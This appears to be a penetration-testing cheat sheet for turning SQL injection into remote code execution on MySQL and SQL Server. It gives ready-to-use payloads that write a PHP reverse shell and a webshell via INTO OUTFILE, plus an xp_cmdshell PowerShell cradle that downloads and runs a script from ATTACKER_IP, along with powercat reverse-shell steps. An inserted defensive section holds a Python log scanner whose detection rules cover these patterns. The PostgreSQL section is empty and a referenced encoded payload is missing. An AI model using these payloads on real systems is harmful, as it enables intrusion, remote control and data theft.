Payload for RCE
MySQL
Modify each command as per the situation before using it.
If the directory is writable, the payload file will be created.
'; SELECT '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\'"); ?>', null, null, null, null INTO OUTFILE '/var/www/html/tmp/shell.php'; -- //
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
SQL Server
'; exec xp_cmdshell('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP/shell.ps1\')"') --
PostgreSQL
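A defender-side check, added here as an example and not part of the original cheat sheet: it scans a constructed query-log feed for the abuse patterns shown above (INTO OUTFILE into a web root, PHP tags inside string literals, xp_cmdshell being executed or enabled, PowerShell download cradles) and checks the MySQL secure_file_priv setting that stops the OUTFILE write in the first place. The log line format and rule names are assumptions.

```python
import re

# Constructed query-log feed (timestamp, connection id, query) covering both
# a MySQL and an MSSQL session; not real log data. Lines 2, 4 and 5 mirror
# the INTO OUTFILE and xp_cmdshell patterns from the payloads above.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 12 Query SELECT id, name FROM products WHERE id = 7
2024-01-01T10:00:01Z 12 Query SELECT '<?php system($_GET["c"]);?>', null INTO OUTFILE '/var/www/html/tmp/shell.php'
2024-01-01T10:00:02Z 13 Query SELECT name INTO OUTFILE '/tmp/export.csv' FROM products
2024-01-01T10:00:03Z 14 Query EXEC master..xp_cmdshell 'powershell -NoP -W Hidden -Command IEX(...)'
2024-01-01T10:00:04Z 15 Query EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
"""

# Detection rules, ordered from most to least specific. Rule names are assumed.
RULES = [
    ("file-write-to-webroot",
     re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s+['\"][^'\"]*(/var/www|/htdocs|inetpub)", re.I)),
    ("file-write", re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("php-tag-in-literal", re.compile(r"<\?php", re.I)),
    # matches "xp_cmdshell '...'" and "xp_cmdshell(...)" but not the
    # quoted option name in sp_configure 'xp_cmdshell', 1
    ("xp_cmdshell-exec", re.compile(r"\bxp_cmdshell(\s+|\s*\()", re.I)),
    ("xp_cmdshell-enable", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("suspicious-powershell",
     re.compile(r"powershell[^\n]*(-enc\w*\s|IEX|DownloadString)", re.I)),
]


def scan_query_log(text):
    """Return [(line_no, [rule names])] for every line that trips a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        matched = [name for name, rx in RULES if rx.search(line)]
        if matched:
            hits.append((n, matched))
    return hits


def secure_file_priv_ok(value):
    """MySQL hardening check: '' lets INTO OUTFILE write anywhere the server
    can; 'NULL' disables it; a directory confines it to that path."""
    return value is not None and value.strip() != ""
```

The third line (a legitimate export to /tmp) still trips the broad file-write rule, so in practice that rule is a low-severity signal and only the web-root and PHP-tag rules should page anyone.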
MSSQL
If you can log in with impacket-mssqlclient, that is, you have valid login credentials, then run commands from that session for RCE.
If the above method doesn't work, then try the method below.

Use this encoded text to make a reverse shell, but also make sure that the Python web server is running on port 80 in a directory where powercat.ps1 is present, and that netcat is listening.

Now let's try the reverse shell.